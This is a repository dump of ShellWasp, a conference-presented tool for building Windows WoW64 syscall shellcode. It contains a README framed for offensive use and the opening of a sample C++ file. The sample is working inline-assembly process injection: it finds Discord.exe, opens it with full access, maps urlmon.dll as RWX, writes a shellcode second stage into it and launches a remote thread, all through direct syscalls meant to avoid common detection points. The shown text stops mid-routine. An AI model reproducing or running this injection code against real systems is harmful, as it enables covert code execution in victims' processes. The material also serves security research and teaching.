Showing preview only (2,620K chars total). Download the full file or copy to clipboard to get everything.
Repository: Bw3ll/ShellWasp
Branch: main
Commit: 09f69cddfb21
Files: 28
Total size: 2.5 MB
Directory structure:
gitextract_iepmxh43/
├── LICENSE
├── README.md
├── Samples/
│ ├── BHMEA _shellcode_injection3.cpp
│ ├── alternative_create_process.asm
│ ├── alternative_create_process_SHAREM_output.txt
│ └── alternative_create_process_tester.c
├── setup.py
├── shellWasp.py
└── start/
├── Syscall Output/
│ └── Win1011_NtAllocateVirtualMemory_NtQuerySystemInformation_NtOpenProcess_20230414_143422.txt
├── WinDbgList.txt
├── WinSysCalls.json
├── __init__.py
├── config.cfg
├── convertSyscallsToReverse.py
├── myKeys.py
├── parseconf.py
├── reverseWinSyscalls.json
├── reverseWinSyscallsInt.json
├── shellWasp.py
├── singleton/
│ ├── __init__.py
│ └── helpers.py
├── syscallAIHelper.py
├── syscallAiPrompts.py
├── syscallPossibleValues.py
├── syscall_parser_toJson.py
├── syscall_signatures.json
├── syscall_signatures.py
└── ui.py
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2022 Bramwell Brizendine
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# ShellWasp 2.1
ShellWasp is a the original tool to faciliate creating shellcode utilizing syscalls. ShellWasp helps build templates for 32-bit WoW64 shellcode that uses Windows syscalls while avoiding the portability problem that comes with hardcoded SSNs across OS builds.
ShellWasp was first released at DEF CON 30 in August 2022. Since then it has expanded considerably. Version 2.0 added alternative ways to discover OSBuild, including User_Shared_Data and PEB via r12, along with three new ways to invoke the syscall through WoW64: one for Windows 7 and two for Windows 10/11. With ShellWasp 2.1, we have added new capabilities to get sample, illustrative values for function parameters - both from a pre-computed, offline mode and generated on the fly from AI (if an OpenAI key is provided). There are plans for additional new features in the coming months. There will be other maintenance updates coming soon as well.
## Presentations and Background
The primary resource on using Windows syscalls in shellcode can be found in the most recent, definitive conference presentation, from HITB Amsterdam 2023 page for further details, including full-length, hour long video, detailed slides, to learn more about this project: https://conference.hitb.org/hitbsecconf2023ams/session/windows-syscalls-in-shellcode-advanced-techniques-for-malicious-functionality/
Slides are available for download at HITB. This project has evolved tremendously since its initial debut at [DEFCON 30](https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Tarek%20Abdelmotaleb%20%20%20Dr.%20Bramwell%20Brizendine%20-%20Weaponizing%20Windows%20Syscalls%20as%20Modern%2032-bit%20Shellcode.pdf).
ShellWasp was also presented as part of a Black Hat MEA briefing in 2022, and slides and white paper are available within the GitHub repository. Both the Black Hat and DEF CON presentations were superceded by the Hack in the Box Amsterdam 2023 presetnation, which contains significanlty more new content and several novel features for ShellWasp
## What ShellWasp Does
ShellWasp is a way to help perform syscalls in WoW64 shellcode, and the latest version features multiple, novel methods of invoking the syscall in a WoW64 environment, as detailed in the HITB Amsterstam 2023 talk.
ShellWasp automates building templates of syscall shellcode. The template is intended to be just that - a template. The user still needs to determine what parameter values to use and how to build any required structures. The goal is to make handcrafted syscall shellcode more manageable, especially when multiple syscalls are involved. Nearly all user-mode syscalls supported, including all the ones I could find function prototypes for. ShellWasp also solves the syscall portability problem for syscalls. It identifies the OS build, and ShellWasp creates a syscall arrray in response to user input, allowing the current syscall values (SSNs) to be found at runtime, rather than having to be hardcoded, which can limit how you can use them across OS builds. ShellWasp takes care of managing the syscall array, so if a syscall is used multiple times, there will only be one entry in the syscall array. Thus, ShellWasp will allows syscall values (SSNs) to be obtained dynamically. If you are building complex syscall shellcode with multiple syscalls being used (not for the faint-hearted), and you want to make sure there is no common way of invoking it, such as fs:0xc0, then these new additions may be of interest. Though for simplicity's sake, I recommend beginning with the "simpler" way of invoking it, via fs:0xc0.
The shellcode size created by ShellWasp is relatively small in size. Users can select the OS builds to support, and it is recommend to use perhaps just some of the most recent ones from Windows 7/10/11, rather than every possible one. This can help keep size more manageable. Additionall, the way in which syscalls are called differs from Windows 7 and Windows 10/11. ShellWasp will automatically take care of that based on the selections the user makes. We have created syscall shellcode that works across all three OS, using our technique.
To achieve a more compact shellcode size, ShellWasp utilizes precomputed syscall tables in JSON format, as opposed to dynamic SSN resolution techniques, which may lengthen the shellcode. This allows us to keep the shellcode size minimal.
ShellWasp supports nearly all user-mode syscalls for which I could find function prototypes. It identifies the OS build and creates a syscall array based on user input, allowing the current SSNs to be found at runtime rather than hardcoded. If a syscall is used multiple times, ShellWasp manages that for you so there is only one entry in the syscall array.
## Scope
ShellWasp is geared toward 32-bit WoW64 shellcode. It is not meant as a replacement for SysWhispers2, FreshyCalls, or related work. This is a different direction for utilizing Windows syscalls and is focused on shellcode specifically. The point is not just how to recover the SSN. The point is helping facilitate syscall shellcode in a compact and reliable form.
## Why ShellWasp May Be Useful
If you are building more complex syscall shellcode and do not want to rely only on a common mechanism such as fs:0xc0, the novel WoW64 invocation methods provided by ShellWasp may be useful. That said, for simplicity's sake, I still recommend beginning with the simpler approach via fs:0xc0, before moving onto more advanced techniques. ShellWasp is most useful when you want portability across supported Windows releases, compact output, and a cleaner way to manage repeated syscall use in one piece of shellcode.
ShellWasp 2.0 includes some alternative ways to discover the OSBuild. ShellWasp 2.0 additionally provides three new ways to invoke the syscall from WoW64, all without syscall, int 0x2e or fs:0xc0 - two for Windows 10/11 and one for Windows 7. These two new methods have not been seen before (see below images).
ShellWasp is not an alternative to SysWhispers2/3 or the work of ElephantSe4l, with Freshycalls, etc. This is a different direction for utilizing Windows syscalls. The method of determing OS build or the SSN is not important. (ShellWasp provides a few ways to determine this.) ShellWasp is about helping faciliate syscall shellcode in a compact and reliable form.
## Optional 2.1 Parameter Support (New)
ShellWasp 2.1 adds the ability to generate sample, illustrative parameter values. These can come either from a precomputed offline mode or, if an OpenAI key is provided, through AI-assisted generation. These are intended as learning aids and starting points, not as finished parameter choices. ShellWasp does not build end-to-end shellcode, but helps you start the process. This can be rather useful, as it might expose some necessary values that might not be easily found.
## Using ShellWasp
The assembly generated by ShellWasp is relatively compact. Users can select the OS builds to support and the syscalls to include. It is usually not necessary to target every supported build. In many cases, selecting only the releases you care about will help keep the resulting shellcode size more manageable. Be realistic - if this is being done for offensive security purposes, is it really necessary to target every os build? It is certainly an option if payload size is not a consideration. The Assembly generated by ShellWasp is intended to be more compact in size. Additionally, as many people have automatic Windows update, it may be desirable to select only more recent OS builds, rather than every possible one, and this helps reduce size as well. Users can easily and quickly rearrange syscalls in shellcode.
ShellWasp takes care of much of the bookkeeping, but you still need to supply the parameter values and build out any required structures. For hints and tips, use the pre-computed illustrative samples or generate something on the fly with an AI key. Though keep in mind - these are just starting points, which may or may not be appropriate for your project. Working to build syscall shellcode is an iterative process requiring trial and error.
A reminder: ShellWasp only supports Windows 7/10/11 at the moment, as a desing choice. It is easy to select desired Windows releases via config file or UI. Changes can also be saved to the to config.
## Quick Start
Download the repository and run it from the command line: `py shellWasp.py`
You can also use `python shellWasp.py` if that is how Python is configured on your system.
Desired settings for selected OS builds and Windows syscalls can be added to the config file or changed in the UI. Those settings can also be saved back to the config.
## Installation
A setup file is provided to help ensure the needed libraries are installed:
`py setup.py install`
You may substitute `python` for `py` as needed.
This installs the required libraries, including `colorama` and `keystone-engine`. Keystone is used to assemble the generated code so the assembly can be validated. ShellWasp is still intended to produce a template whose parameters need to be customized, so the generated bytes are not the main focus of the tool.
If you do not want to use `setup.py`, you can install the dependencies manually:
`pip install keystone-engine`
`pip install colorama`
Note: You select the OS builds to target--it is not necessary to target every single build--and you select the syscalls to use. The above is just a random illustration. ShellWasp takes care of a lot of the details, but you still need to build out the parameters and required structures.
## Repository Layout
* `shellWasp.py` - small launcher for the tool
* `start/shellWasp.py` - main implementation
* `start/config.cfg` - configuration for OS builds and syscall choices
* `start/ui.py` - UI support
* `start/WinSysCalls.json` and related files - syscall tables and related data
* `Samples/` - example files
* `BH Slides-White paper/` - slides and white paper material
## Updates
* March 2026 update: ShellWasp 2.1 has a major usability upgrade to produce clearer and more realistic parameter generation. It can now produce richer illustrative syscall parameters, with optional structure-aware examples and field-level structure expansions where helpful. These are intended as learning aids. I also added chunked processing and automatic aggregation for larger batches of syscalls while preserving call order and supporting repeated uses of the same export in a single run. To make longer sessions easier to manage, ShellWasp now supports a continuously updated working results file, resume capability, and both timestamped JSON snapshots and cleaned-up text exports for review and reuse. More changes are coming.
* April 19, 2023 - ShellWasp 2.0 is released with masssive changes, including alternative ways to identify to the OSBuild, and three previously undocumented ways to invoke the syscall via WoW64 (one for Windows 7 and two for Windows 10/11).
* On Nov. 1, 2022, support was added for Windows 10 22H2 and Windows 11 22H2. These are the newest Windows releases. Note: we do not support Insider preview builds nor Server.
* On Nov. 1, 2022, the mechanism by which the pointer to the syscall array is preserved has been changed. In testing shellcode with chains of several Windows syscalls, some stability issues were noted with values on the stack. In order to avoid those issues, it was decided to change the stack cleanup (`add esp, 0xXX`) and `pop edi`, to `mov edi, [esp+0xYY]` - YY being the number of bytes that would have been "cleaned" from the stack. The `push edi` that follows is retained. ShellWasp maintains a pointer to the syscall array at edi, and since the actual syscall itself destroys the value contained in edi, there needs to be a way to restore it, after the return from the far jump to kernel-mode. It was felt this new Assembly would be a more stable way to accomplish this. Of course, another option could be to have a pointer to the syscall array stored at some location on ebp or other memory, and then that could be used to restore EDI. That would in some ways be simpler, as it would be possible to avoiding needing to count the number of bytes to go back. However, it was felt that `mov edi, [esp+0xYY]` would be safer for novices. If it was stored elsewhere in memory at a fixed location, such as the stack, it could be possible to accidentally overwrite it. Both approaches take minimal time and effort.
## Correction
Please note that previous public comments I made regarding sorting by address techniques no longer working were incorrect. I apologize for the error. Keep in mind this tool is geared for WoW64, 32-bit shellcode, not as a replacement for other syscall techniques. Our efforts remain in that WoW64 realm.
## License
This project is released under the terms of the MIT license.
================================================
FILE: Samples/BHMEA _shellcode_injection3.cpp
================================================
// Author: Dr. Bramwell Brizendine
// Event: Black Hat Middle East and Africa in Riyadh, KSA
// This uses the ShellWasp technique for syscall shellcode
// ShellWasp - for Syscall Shellcode: https://github.com/Bw3ll/ShellWasp
// This inline Assembly can allow the syscall shellcode to be tested (and edited) simply.
// I will release it in shellcode form at a little time--I have some additional minor cleanup to do.
// The pure shellcode (non-inline Assembly) one I have has some minor stability issues before I can release it.
// Description on compiling and using with Developer prompt discussed later.
#include <windows.h>
#include <iostream>
#include <stdlib.h>
#include <stdio.h>
#include <string>
using namespace std;
int main()
{
// I do not actually use this for the second stage payload. See below with _emit keywords.
unsigned char myShell[] = "\x90\x90\x90\x90\x31\xc9\xf7\xe1\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd5\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x68\x6c\x6c\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x33\x32\x2e\x64\x68\x55\x73\x65\x72\x54\xff\xd0\x68\x6f\x78\x41\x61\x66\x83\x6c\x24\x03\x61\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd5\x83\xc4\x10\x31\xd2\x31\xc9\x52\x68\x50\x77\x6e\x64\x89\xe7\x52\x68\x59\x65\x73\x73\x89\xe1\x52\x57\x51\x52\xff\xd0\x83\xc4\x10\x68\x65\x73\x73\x61\x66\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd5\x31\xc9\x51\xff\xd0";
void* mem2 = malloc(0x1060);
memcpy(&mem2, &myShell, sizeof(myShell));
// This syscall shellcode (inlineAssembly version)
// ; ShellWasp - for Syscall Shellcode: https://github.com/Bw3ll/ShellWasp
// ;
// ; Note: This is proof-of-concept, just to demonstrate what is possible with syscall shellcode.
// ; It utilizes the ShellWasp approach to syscall shellcode, with a syscall array having been created
// ; by it. This syscall shellcode works for Windows 7 and 10/11. Note that with Windows 10/11, CFG will
// ; cause the the second stage shellcode - a messagebox - to immediately terminate. It does, however,
// ; succeed in the sense that all syscalls work. An additional syscall to NtSetInformationVirtualMemory
// ; could create a CFG exception. I had success with the corresponding WinAPI function,
// ; SetProcessValidCallTargets (that is not included). Either one creates a CFG exception that can allow
// ; for the process injection to succeed in spite of CFG.
// ; The goal here is to avoid using WinAPI functions, so that is not included.
// ; Another reader can implement theNtSetInformationVirtualMemory.
// ; With Windows 7, there is no CFG, and it works without issue.
// ;
// ; The goal of this shellcode is to enumerate all active processes, find Discord and determine its
// ; PID,and then to create a library, Urlmon.dll, which is then used to inject a second stage payload.
// ; The originalprocess then must activate the second stage shellcode, which is present in Discord.exe.
// ; In order to do this, the shellcode loads urlmon.dll into the target process and gives it RWX. It
// ; then copies the second stage payload over into our unneeded urlmon.dll, 0x3000 bytes from the start.
// ; The shellcode then begins to execude the second stage shellcode.
// ; If someone wanted to, they could substitute Discord for test.exe or any non-CFG process on Win10/11, for
// ; testing purposes. CFG does not exist on Win7.
// ; The syscalls utilized follow:
// ; 1. NtAllocateVirtualMemory
// ; 2. NtQuerySystemInformation
// ; 3. NtOpenProcess
// ; 4. NtCreateFile
// ; 5. NtCreateSection
// ; 6. NtMapViewofSection
// ; 7. NtProtectVirtualMemory
// ; 8. NtWriteVirtualMemory
// ; 9. NtCreateThreadEx
// ; 10. NtWaitForSingleObject (optional - not needed for Discord)
// ;
// ; With inline Assembly, I typically use Sublime to write and then Developer prompt to compile.
// ; The syntax for compiling with Developer Prompt is as follows:
// ; cl filename.cpp
// ;
// ; Please note also that one reason I use inline Assembly is the ability to use int 3, which is very
// ; helpful when debugging in WinDbg. This is a breakpoint. If you do not wish to use those, you will
// ; want to comment those out! A program with int 3 can only be run inside a debugger - otherwise it errors
// ; out. Thus, if using this outside a debugger, the int 3's should be commented out!!
__asm {
jmp start
ourSyscall: ; Syscall Function
cmp dword ptr [edi-0x4],0xa
jne win7
win10: ; Windows 10/11 Syscall
call dword ptr fs:[0xc0]
ret
win7: ; Windows 7 Syscall
xor ecx, ecx
lea edx, [esp+4]
call dword ptr fs:[0xc0]
add esp, 4
ret
start:
int 3 ; breakpoint - remove if outside of debugger
mov eax, fs:[0x30]
mov ebx, [eax+0xac]
mov eax, [eax+0xa4]
mov ecx, esp
sub esp, 0x1000
cmp bl, 0x64 ; 21H2, Win10 release
jl less1
push 0x18 ; NtAllocateVirtualMemory
push 0x36 ; NtQuerySystemInformation
push 0x26 ; NtOpenProcess
push 0x55 ; NtCreateFile
push 0x4a ; NtCreateSection
push 0x28 ; NtMapViewOfSection
push 0x50 ; NtProtectVirtualMemory
push 0x3a ; NtWriteVirtualMemory
push 0xc1 ; NtCreateThreadEx
push 0xd0004 ; NtWaitForSingleObject
jmp saveSyscallArray
less1:
cmp bl, 0x63 ; 21H1, Win10 release
jl less2
push 0x18 ; NtAllocateVirtualMemory
push 0x36 ; NtQuerySystemInformation
push 0x26 ; NtOpenProcess
push 0x55 ; NtCreateFile
push 0x4a ; NtCreateSection
push 0x28 ; NtMapViewOfSection
push 0x50 ; NtProtectVirtualMemory
push 0x3a ; NtWriteVirtualMemory
push 0xc1 ; NtCreateThreadEx
push 0xd0004 ; NtWaitForSingleObject
jmp saveSyscallArray
less2:
cmp bl, 0xF0 ; 21H2, Win11 release
jl less3
push 0x18 ; NtAllocateVirtualMemory
push 0x36 ; NtQuerySystemInformation
push 0x26 ; NtOpenProcess
push 0x55 ; NtCreateFile
push 0x4a ; NtCreateSection
push 0x28 ; NtMapViewOfSection
push 0x50 ; NtProtectVirtualMemory
push 0x3a ; NtWriteVirtualMemory
push 0xc5 ; NtCreateThreadEx
push 0xd0004 ; NtWaitForSingleObject
jmp saveSyscallArray
less3:
cmp bl, 0xB1 ; Win7, Sp1 release
jl end2
push 0x15 ; NtAllocateVirtualMemory
push 0x33 ; NtQuerySystemInformation
push 0x23 ; NtOpenProcess
push 0x52 ; NtCreateFile
push 0x47 ; NtCreateSection
push 0x25 ; NtMapViewOfSection
push 0x4d ; NtProtectVirtualMemory
push 0x37 ; NtWriteVirtualMemory
push 0xa5 ; NtCreateThreadEx
push 0x1 ; NtWaitForSingleObject
saveSyscallArray:
push eax
mov edi, esp
add edi, 0x4
mov esp, ecx
int 3 ; breakpoint - remove if outside of debugger
xor ecx, ecx
mov [ebp-0x20], ecx
mov [ebp-0x30], ecx
mov dword ptr[ebp - 0x18], 0x600000 ; 0x30000
restart:
push edi
push 0x40 // ; ULONG Protect
push 0x3000 // ; ULONG AllocationType
lea ebx, dword ptr[ebp - 0x18]
push ebx // ; PSIZE_T RegionSize
xor ecx, ecx
push ecx // ; ULONG_PTR ZeroBits
mov dword ptr[ebp - 0x280], 0
lea ebx, dword ptr[ebp - 0x280]
push ebx // ; PVOID *BaseAddress
push -1 // ; HANDLE ProcessHandle
mov eax, [edi+0x24] ; NtAllocateVirtualMemory syscall
int 3 ; breakpoint - remove if outside of debugger
call ourSyscall
mov edi, [esp+0x18]
push edi
lea ecx, dword ptr [ebp-0x20]
push ecx ; PULONecxG ReturnLength
mov ecx, dword ptr [ebp-0x18]
push ecx ; ULONG SystemInformationLength
mov ecx, dword ptr[ebp - 0x280]
push ecx ; PVOID SystemInformation
push 0x00000005 ; SYSTEM_INFORMATION_CLASS SystemInformationClass -> 0x05 SystemProcessInformation
mov eax, [edi+0x20] ; NtQuerySystemInformation syscall
int 3 ; breakpoint - remove if outside of debugger
call ourSyscall
mov edi, [esp+0x10]
push edi
mov ecx, dword ptr [ebp-0x20]
mov dword ptr[ebp - 0x18], ecx
mov dword ptr [ebp-0x266], esp
cmp eax, 0xC0000004
je restart
mov esp, dword ptr [ebp-0x266]
xor edx, edx ; Discord.exe
push edx
mov dx, 0x65
push dx
mov dx, 0x78
push dx
mov dx, 0x65
push dx
mov dx, 0x2e
push dx
mov dx, 0x64
push dx
mov dx, 0x72
push dx
mov dx, 0x6f
push dx
mov dx, 0x63
push dx
mov dx, 0x73
push dx
mov dx, 0x69
push dx
mov dx, 0x44
push dx
// xor edx, edx ; test.exe ; if test.exe, must change sizes in repe cmpsb string comparison
// push edx
// mov dx, 0x65
// push dx
// mov dx, 0x78
// push dx
// mov dx, 0x65
// push dx
// mov dx, 0x2e
// push dx
// mov dx, 0x74
// push dx
// mov dx, 0x73
// push dx
// mov dx, 0x65
// push dx
// mov dx, 0x74
// push dx
// // int 3
mov dword ptr [ebp-0xdd], esp
xor edx, edx
push edx ; SecurityQualityOfService
push edx ; SecurityDescriptor
push edx ; Attributes
push edx ; ObjectName
push edx ; RootDirectory
push 0x00000018 ; Length
mov [ebp-0xfe], esp ; _OBJECT_ATTRIBUTES
; the searching is borrowed from the presentation Tarek and I did at DEF CON 30-- so that credit goes to Tarek.
enumerateProcesses:
mov eax, dword ptr[ebp-0x280] // start of SystemInformation structure, with all processes
cmp eax, 0 ; check to see if reached end
je finishedProcesses
mov ebx, dword ptr[ebp - 0x280]
mov esi, dword ptr[ebx+0x3c] ; dereferencing the location for unicode string text for process name
cmp esi, 0
je nextProc
mov edi, dword ptr[ebp-0xdd] // Source
mov ecx, 8
// int 3
cld
repe cmpsb ; check for match for target process
jecxz match
nextProc:
add eax, dword ptr[eax] ; no match - add the size of current entry to enumerate next process
mov dword ptr[ebp-0x280], eax ; save current process
jmp enumerateProcesses
finishedProcesses:
match:
mov edi, [esp+0x32]
push edi
xor ecx, ecx
push ecx ; uniquethread
push dword ptr[ebp-0x280] ; uniqueprocess
mov [ebp-0x1ff], esp ; ptr to ClientId
mov ecx, esp
mov eax, dword ptr[ebx+0x44] //pid
mov dword ptr[ecx], eax
xor edx, edx
push edx
mov dword ptr [ebp-0xbe], esp ; ProcessHandle
mov ecx, [ebp-0x1ff]
push ecx ; PCLIENT_ID ClientId
mov ecx, [ebp-0xfe]
push ecx ; POBJECT_ATTRIBUTES ObjectAttributes
push 0x1FFFFF ; ACCESS_MASK AccessMask PROCESS_ALL_ACCESS
mov ecx, [ebp-0xbe]
push ecx ; PHANDLE ProcessHandle
int 3 ; breakpoint - remove if outside of debugger
mov eax, [edi+0x1c] ; NtOpenProcess syscall
call ourSyscall
mov edi, [esp+0x1c]
;int 3
push edi
; start ntcreatesection
; create SectionHandle
xor edx, edx
mov [ebp-0x324], edx
; create ObjectAttributes structure
; todo
mov [ebp-0x342], esp
;create PLARGE_INTEGER MaximumSize
; todo
; PLARGE_INTEGER ByteOffset
xor ecx, ecx
push 0x13C000 ; high part 1294336 -> 0x13C000
push ecx ; low part
push 0x50
push ecx ; low part
mov [ebp-0x348], esp
xor edx, edx
push edx
mov dx, 0x6c
push dx
mov dx, 0x6c
push dx
mov dx, 0x64
push dx
mov dx, 0x2e
push dx
mov dx, 0x6e
push dx
mov dx, 0x6f
push dx
mov dx, 0x6d
push dx
mov dx, 0x6c
push dx
mov dx, 0x72
push dx
mov dx, 0x75
push dx
mov dx, 0x5c
push dx
mov dx, 0x34
push dx
mov dx, 0x36
push dx
mov dx, 0x57
push dx
mov dx, 0x4f
push dx
mov dx, 0x57
push dx
mov dx, 0x73
push dx
mov dx, 0x79
push dx
mov dx, 0x53
push dx
mov dx, 0x5c
push dx
mov dx, 0x73
push dx
mov dx, 0x77
push dx
mov dx, 0x6f
push dx
mov dx, 0x64
push dx
mov dx, 0x6e
push dx
mov dx, 0x69
push dx
mov dx, 0x57
push dx
mov dx, 0x5c
push dx
mov dx, 0x3a
push dx
mov dx, 0x63
push dx
mov dx, 0x5c
push dx
mov dx, 0x3f
push dx
mov dx, 0x3f
push dx
mov dx, 0x5c
push dx
mov [ebp-0x2fd], esp
; int 3
; UNICODE_STRING REG_PATH
xor edx, edx
push dword ptr [ebp-0x2fd] ; Buffer
mov dx, 70
push dx ; Max Length
mov dx, 68
push dx ; Length
mov [ebp-0xed], esp ;
; _IO_STATUS_BLOCK
xor ecx, ecx
push ecx ; ulong_ptr information
push ecx ; pvoid pointer reserved
push ecx ; ntstatus status
mov [ebp-0x48], esp ; out PIO_STATUS_BLOCK IoStatusBlock
; _OBJECT_ATTRIBUTES
xor edx, edx
xor ecx, ecx
push edx ; SecurityQualityOfService = NULL
push edx ; SecurityDescriptor = NULL
inc ecx
shl ecx, 6
push ecx ; Attributes = OBJ_CASE_INSENSITIVE = 0x40
push dword ptr [ebp-0xed] ; UNICODE_STRING
push edx ; Root Directory = NULL
push 0x18 ; Length
mov [ebp-0x24], esp ; OBJECT_ATTR
xor ecx, ecx
mov [ebp-0x3dd], ecx ; PHANDLE FileHandle
mov [ebp-0xee], ecx ; out PIO_STATUS_BLOCK IoStatusBlock
; start ntcreatefile
push 0x00000000 ; ULONG EaLength
push 0x00000000 ; PVOID EaBuffer
push 0x00000860 ; ULONG CreateOptions FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 | FILE_RANDOM_ACCESS 0x00000800 | FILE_NON_DIRECTORY_FILE 0x00000040
push 0x0003 ; ULONG CreateDisposition OPEN_EXISTING = 3 FILE_OVERWRITE_IF 0x00000005
push 0x1 ; ULONG ShareAccess 2 FILE_SHARE_WRITE 1 FILE_SHARE_read
push 0x80 ; ULONG FileAttributes 128 0x80 FILE_ATTRIBUTE_NORMAL
push 0x00000000 ; PLARGE_INTEGER AllocationSize
push dword ptr [ebp-0x48] ; out PIO_STATUS_BLOCK IoStatusBlock
push dword ptr [ebp-0x24] ; POBJECT_ATTRIBUTES ObjectAttributes
push 0x120089; GENERIC_READ = 120089, ACCESS_MASK DesiredAccess
lea ecx, [ebp-0x3dd]
push ecx ; PHANDLE FileHandle
int 3 ; breakpoint - remove if outside of debugger
mov eax, [edi+0x18] ; NtCreateFile syscall
call ourSyscall
mov edi, [esp+0xb0]; 0x84 + 0x22 =
push edi
; start ntcreatesection
; create SectionHandle
xor edx, edx
mov [ebp-0x324], edx
; create ObjectAttributes structure
; todo
mov [ebp-0x342], esp
;create PLARGE_INTEGER MaximumSize
; todo
; PLARGE_INTEGER ByteOffset
xor ecx, ecx
push 0x13C000 ; high part 1294336 -> 0x13C000
push ecx ; low part
push 0x50
push ecx ; low part
mov [ebp-0x348], esp
mov ecx, [ebp-0x3dd] ; out HANDLE FileHandle not a pointer - handle
push ecx ; HANDLE FileHandle
push 0x1000000 ; ULONG AllocationAttributes UInt32 SEC_IMAGE = 0x1000000
push 0x00000002 ; ULONG SectionPageProtection / Page Attributes -- UInt32 PAGE_READONLY = 0x02;
mov ecx, [ebp-0x348]
push 0 ; PLARGE_INTEGER MaximumSize
push 0x0 ; POBJECT_ATTRIBUTES ObjectAttributes NULL
push 0x10000000 ; ACCESS_MASK DesiredAccess SECTION_ALL_ACCESS = 0x10000000, SECTION_MAP_WRITE | SECTION_MAP_READ | SECTION_MAP_EXECUT
lea ecx, [ebp-0x324]
push ecx ; PHANDLE SectionHandle
int 3 ; breakpoint - remove if outside of debugger
mov eax, [edi+0x14] ; NtCreateSection syscall
call ourSyscall
mov edi, [esp+0x2c]
;ViewSize -> 0
xor ecx, ecx
push ecx
mov [ebp-0x98], ecx
mov [ebp-0x88], ecx
retry:
push edi
push 0x00000040 ; ULONG Protect PAGE_READWRITE 04 / PAGE_READONLY = 0x02
push 0x00000000 ; ULONG AllocationType NULL
push 0x00000001 ; DWORD InheritDisposition ViewShare
lea ecx, [ebp-0x98]
push ecx ; PULONG ViewSize
push 0x00000000 ; PLARGE_INTEGER SectionOffset NULL
push 0x00000000 ; ULONG CommitSize NULL
push 0x00000000 ; ULONG stackZeroBits NULL
lea ecx, [ebp-0x88]
push ecx ; PVOID *BaseAddress NULL
// ; int 3
mov ecx, dword ptr[ebp-0xbe] ;
mov ecx, dword ptr [ecx]
push ecx ; HANDLE ProcessHandle
push dword ptr [ebp-0x324] ; HANDLE SectionHandle
int 3 ; breakpoint - remove if outside of debugger
mov eax, [edi+0x10] ; NtMapViewOfSection syscall
call ourSyscall
mov edi, [esp+0x28] ; 0x28 + 0x4 =
push edi
;;start NtProtectVirtualMemory
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push 0x0000a12c ; desired size
mov [ebp-0x64], esp
xor ecx, ecx
push ecx
push ecx
mov [ebp-0x424], esp
mov ecx, [ebp-0x424]
push ecx ; PULONG OldAccessProtection
push 0x00000040 ; ULONG NewAccessProtection
mov ecx, [ebp-0x64]
push ecx ; PULONG NumberOfBytesToProtect
lea ecx, [ebp-0x88]
push ecx ; PVOID *BaseAddress
mov ecx, dword ptr[ebp-0xbe] ;
mov ecx, dword ptr [ecx]
push ecx ; HANDLE ProcessHandle
int 3 ; breakpoint - remove if outside of debugger
// mov eax, 0x4D ; NtProtectVirtualMemory syscall
mov eax, [edi+0xc] ; NtProtectVirtualMemory syscall
call ourSyscall
mov edi, [esp+0x34] ; 0x14 + 20= 34
push edi
;;; start ntwritevirtualmemory
push 0 ; PULONG NumberOfBytesWritten
push 0x100 ; ULONG NumberOfBytesToWrite
; Note: The inline Assembly (VS) way of doing self-location is a little screwy, so traditional call pop way does not work as easily as it word doing NASM. This is one place where an adjustment is necessary when converting to shellcode
lea ecx, ourShell
add ecx, 0x4
push ecx ; PVOID Buffer
lea ecx, [ebp-0x88]
mov edx, dword ptr [ecx]
add edx, 0x3000
mov dword ptr [ebp-0x88], edx
mov ecx, [ebp-0x88]
push ecx ; PVOID BaseAddress
mov ecx, dword ptr[ebp-0xbe]
mov ecx, dword ptr [ecx]
push ecx ; HANDLE ProcessHandle
int 3 ; breakpoint - remove if outside of debugger
mov eax, [edi+0x8] ; NtWriteVirtualMemory syscall
call ourSyscall
mov edi, [esp+0x14]
push edi
xor edx, edx
push edx ; NULL pBytesBuffer
push edx ; NULL sizeOfStackReserve
push edx ; NULL sizeOfStackCommit
push edx ; NULL stackZeroBits
push edx ; FALSE bCreateSuspsended
push edx ; 0 lpParameter
mov ebx, dword ptr[ebp - 0x88]
push ebx ; pMemoryAllocation StartRoutine
mov ecx, dword ptr[ebp-0xbe] ; ProcessHandle
mov ecx, dword ptr [ecx]
push ecx ; hCurrentProcess
push 0 ; pObjectAttributes
push 0x1fffff ; PROCESS_ALL_ACCESS; 0x3e0000 desiredACcess = Specific_rights_all + standard_rights_all
mov dword ptr[ebp - 0x290], 0 ; hThread
lea ecx, dword ptr[ebp - 0x290] ; hThread
push ecx ; hThread
int 3 ; breakpoint - remove if outside of debugger
mov eax, [edi+0x4] ; NtCreateThreadEx syscall
call ourSyscall
